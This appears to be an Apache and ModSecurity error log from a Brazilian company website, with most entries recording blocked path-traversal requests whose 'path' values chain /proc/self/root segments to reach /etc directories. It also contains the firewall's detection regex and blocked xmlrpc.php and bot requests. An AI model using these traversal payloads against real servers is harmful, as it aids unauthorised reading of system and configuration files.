[Thu Mar 19 12:09:09.850546 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:45934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRlfu8EFLIOrSqIpuxTQAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:09:12.935877 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:45934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRmPu8EFLIOrSqIpuxTwAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:09:17.531049 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:41370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRnQkwaGbbGflqUZDOvAAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:09:21.137775 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42432] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:09:31.946315 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:41374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRqwkwaGbbGflqUZDOxwAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:09:42.887367 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:39104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRtuoXxyEfFpUF8f8XRQAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:09:44.074105 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:09:48.000847 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:52726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRuwkwaGbbGflqUZDO1QAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:09:51.879979 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:52740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRvwbLMZ6AikZjR9VnKgAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:09:54.769523 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.243.128:54978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRwv-YZRR_7pZ7nDKVJAAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:09:54.898162 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:52754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRwv-YZRR_7pZ7nDKVJQAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:09:59.362057 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:59968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRx_u8EFLIOrSqIpuxcQAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:05.444805 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:59968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwRzfu8EFLIOrSqIpuxdQAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:06.595370 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43610] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:10:10.746230 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:59968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR0vu8EFLIOrSqIpuxfAAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:10:16.790663 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:49364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR19a6ubjKNq_cu4ZfmwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:19.047418 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:38706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR2wkwaGbbGflqUZDO8QAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:27.390631 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:44796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR49a6ubjKNq_cu4ZfpwAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:27.893507 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.228.61:58482] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwR4-oXxyEfFpUF8f8XYAAAAUc"]
[Thu Mar 19 12:10:29.127665 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44240] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:10:34.943776 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:55884] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR6uyqAr6etmhZHNpp8wAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:37.237591 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:55888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR7fu8EFLIOrSqIpuxmQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:38.855398 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:45226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR7vu8EFLIOrSqIpuxnQAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:39.391930 2026] [access_compat:error] [pid 19093:tid 140411624429312] [client 45.80.158.249:64830] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 12:10:40.273087 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:45232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR8AkwaGbbGflqUZDO_wAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:41.659415 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:45248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR8eyqAr6etmhZHNpp9gAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:45.459629 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:45264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR9Mdf6f5d65gmYZSB4AAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:46.846109 2026] [core:alert] [pid 26799:tid 140411741927168] [client 57.141.18.41:48574] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:10:48.575746 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:45274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwR-AkwaGbbGflqUZDPDwAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:10:51.101830 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:10:52.469388 2026] [access_compat:error] [pid 30077:tid 140411590858496] [client 43.250.207.100:49993] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 12:11:13.149839 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45382] AH01075: Error dispatching request to : (polling)
